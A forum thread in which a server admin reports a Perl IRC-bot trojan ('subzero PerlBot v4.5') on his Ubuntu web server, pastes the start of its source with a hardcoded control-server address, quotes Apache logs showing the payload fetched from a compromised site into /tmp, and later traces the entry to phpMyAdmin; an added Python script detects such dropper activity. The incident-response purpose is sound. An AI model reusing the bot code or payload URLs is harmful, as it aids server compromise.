[Solved] subzero PerlBot v4.5 trojan

Huelva wrote:

Hello everyone.

I'm no Linux expert, but I've dabbled a bit. I have a server hosting 8 websites, a cross/historical backup service, downloads, etc.

I now have it running on Lucid 10.04 64-bit, but before that it was on 8.04 (I think), on a Q6600 (4 cores).

The problem is that a few months after the reinstall the cores start saturating at 100% (first one, an hour later another, and so on) until the system hangs. I investigated and it turns out to be a perl process running a temporary file "a" in the /temp folder.

That file is a virus:

#!/usr/bin/perl
# ----------------------------------------------------------- #
#                 subzero PerlBot v4.5                    #
#                     Fuck Off All                            #
# ----------------------------------------------------------- #

system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='3';
my $sleep='7';
my @adms=("daemon");
my @hostauth=("localhost");
my @canais=("#perl");
chop (my $nick = `uname`);
chop (my $ircname = `whoami`);
chop (my $realname = `uname -sr`);
$servidor='67.19.105.66' unless $servidor;
my $porta='8080';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
....................... and much more

The code is quite a bit longer, but I'm not pasting all of it here to keep this short.

In the log you can see when the virus gets downloaded:

rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-Fgav45': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 15:39:32--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'

     0K .......... .....                                      100% 48.6K=0.3s

2012-01-13 15:39:35 (48.6 KB/s) - `c.txt' saved [16241/16241]

sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 15:39:36--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'

     0K .......... .....                                      100% 53.7K=0.3s

2012-01-13 15:39:38 (53.7 KB/s) - `/tmp/p' saved [16241/16241]

--2012-01-13 15:39:38--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied

Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]


mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
[Fri Jan 13 21:42:18 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove `/tmp/gedit.curro.4044826546': Operation not permitted
rm: cannot remove `/tmp/gnome-system-monitor.curro.3986015880': Operation not permitted
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-WASEJH': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 21:42:38--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'

     0K .......... .....                                      100% 37.1K=0.4s

2012-01-13 21:42:42 (37.1 KB/s) - `c.txt' saved [16241/16241]

sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 21:42:44--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'

     0K .......... .....                                      100% 51.6K=0.3s

2012-01-13 21:42:45 (51.6 KB/s) - `/tmp/p' saved [16241/16241]

--2012-01-13 21:42:45--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied

Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]

This is the perl process:

http://img841.imageshack.us/img841/8478/cuelgue1.jpg

Process information
Command: -
Process ID: 25408              Parent process: /sbin/init
Owner: www-data                CPU: 99.9 %
Size: 22968 kB                 Run time: 09:34:19
Nice level:
IO scheduling class:           IO priority:
Real group: www-data           Process group ID: 1539
Group: www-data                TTY: None
Started: 00:42                 Real user: www-data

and these are the files it has open:

http://img823.imageshack.us/img823/1407/cuelgue2.jpg

For process - (PID 25408)

Open files

File descriptor	Type	File size	Inode	Path
Current directory	Directory	4096	1835009	/tmp
Root directory	Directory	4096	2	/
Program code	Regular file	10416	1847282	/usr/bin/perl
Shared library	Regular file	27032	2103551	/usr/lib/perl/5.10.1/auto/Socket/Socket.so
Shared library	Regular file	22904	2103779	/usr/lib/perl/5.10.1/auto/IO/IO.so
Shared library	Regular file	43296	1972107	/lib/libcrypt-2.11.1.so
Shared library	Regular file	1572232	1966281	/lib/libc-2.11.1.so
Shared library	Regular file	135745	1966364	/lib/libpthread-2.11.1.so
Shared library	Regular file	534832	1972135	/lib/libm-2.11.1.so
Shared library	Regular file	14696	1972139	/lib/libdl-2.11.1.so
Shared library	Regular file	1487368	1718887	/usr/lib/libperl.so.5.10.1
Shared library	Regular file	136936	1968483	/lib/ld-2.11.1.so
2w	Regular file	1383104	662674	/var/log/apache2/error.log

Open network connections

Type	Protocol	File descriptor	Details
IPV4	TCP	3u	150.1.30.222:47320	->	81.219.176.123:http-alt	ESTABLISHED
IPV4	TCP	11u	150.1.30.222:59877	->	193.27.78.88:http-alt	CLOSE_WAIT

I've already run Rkhunter and everything is fine.

Curious details:

  • The same thing happened to me with 8.04 32-bit and 10.04 64-bit; the installation was completely fresh, although the websites and database were kept.
  • The task gets installed in cron every second and its creator is www-data. I've configured cron so that only root can add new tasks, and yet the rogue task keeps appearing even after I delete it. When I try to disable it, it won't let me because the author is www-data (odd, because despite only root being allowed to create them it still shows up, although I can't modify it), so I delete it.

As soon as it shows up again I'll paste the task here.

My suspicion is that it gets in through an Apache vulnerability with WordPress. So for now I've moved all the websites to another server and left only one, to start ruling out which site it is.

In any case, I welcome any suggestions.
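An added detection example, not part of the original post or of any tool mentioned in it: wget transcripts, sh errors and perl errors have no business in an Apache error.log, and their presence there means shell commands ran as the web-server user, which is exactly what the excerpt above shows. The script scans error.log lines for that dropper chatter (fetch, save under /tmp or /var/tmp, attempt to run the file with perl) over a constructed sample; the host name and address in the sample are placeholders, not the ones from the thread.

```python
import re

# Constructed sample modelled on the error.log excerpt quoted in the thread;
# host name and address are placeholders, not the ones from the post.
SAMPLE_ERROR_LOG = """\
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
perl: no process found
--2012-01-13 21:42:38--  http://www.example.invalid/wp-content/cache/c.txt
Saving to: `/tmp/p'
2012-01-13 21:42:45 (51.6 KB/s) - `/tmp/p' saved [16241/16241]
sh: curl: not found
sh: cannot create a: Permission denied
Can't open perl script "/var/tmp/c.txt": No such file or directory
"""

# Directories the web-server user can write to; droppers stage payloads there.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# (kind, regex). None of this belongs in an Apache error.log: wget, sh and perl
# chatter there means shell commands were executed as the web-server user.
RULES = (
    ("wget-fetch",   re.compile(r"^--\d{4}-\d\d-\d\d \d\d:\d\d:\d\d--\s+(\S+)")),
    ("save-to",      re.compile(r"^Saving to: `([^']+)'")),
    ("tool-probe",   re.compile(r"^sh: (curl|fetch|lynx|wget): not found")),
    ("perl-exec",    re.compile(r"^Can't open perl script \"([^\"]+)\"")),
    ("killall-perl", re.compile(r"^perl: no process found")),
    ("rm-sweep",     re.compile(r"^rm: cannot remove (?:directory )?`([^']+)'")),
)

def scan_error_log(text):
    """Return one (line_no, kind, detail) tuple per suspicious line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in RULES:
            m = rx.match(line)
            if not m:
                continue
            detail = m.group(1) if m.groups() else ""
            # A download landing in a scratch dir is the strongest single signal.
            if kind == "save-to" and detail.startswith(SCRATCH_DIRS):
                kind = "save-to-scratch"
            findings.append((line_no, kind, detail))
            break
    return findings

def dropper_sequence_present(findings):
    """True when a fetch, a scratch-dir write and a perl run occur in that order."""
    wanted = ["wget-fetch", "save-to-scratch", "perl-exec"]
    for _, kind, _ in findings:
        if wanted and kind == wanted[0]:
            wanted.pop(0)
    return not wanted
```

Run it over the real /var/log/apache2/error.log (the file the process above holds open as descriptor 2) with `scan_error_log(open(path).read())`; a true result from dropper_sequence_present is worth treating as a compromise of the web-server account, not just a noisy log.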

Huelva wrote:

Well, I started removing services and, after some testing, I found that it was a phpadmin vulnerability. I disabled it and that was it; the PC hasn't hung since I did that (more than two months), no more attacks, no hangs, absolute stability.

It seems they were attacking the phpadmin password or some vulnerability until they got in, and from there they attacked the websites.

So my recommendation is not to use phpadmin, or to keep it disabled until you need it.


Ubuntu 8.10 -> 14.04

Scorpyo82 wrote:

Thanks for sharing; I'll look into the phpadmin thing...

Do you mean phpmyadmin??

Thanks. If so, I'll move the link from var/www somewhere else so it can't be used and, when it's needed, as you say, move it back into place, do what I need and change it again.

Regards and thanks.


If I go into Window$ I'm more tense than at a gremlin's christening.
Linux user: 545.017
Please, if your thread gets solved, add [Solved] to the title.

Huelva wrote:

Yes, sorry, I lost the plot: phpmyadmin.


Scorpyo82 wrote:

I've updated to a more recent version; according to its developers there is a serious security flaw in versions 3.3.0 through 3.4.3.2 that allows obtaining root capabilities.

For now I've updated phpmyadmin because it was below 3.3.0 :S Thanks for the heads-up; it would never have crossed my mind that, with the distribution fully updated, it would still have a vulnerable version...

Thanks again.
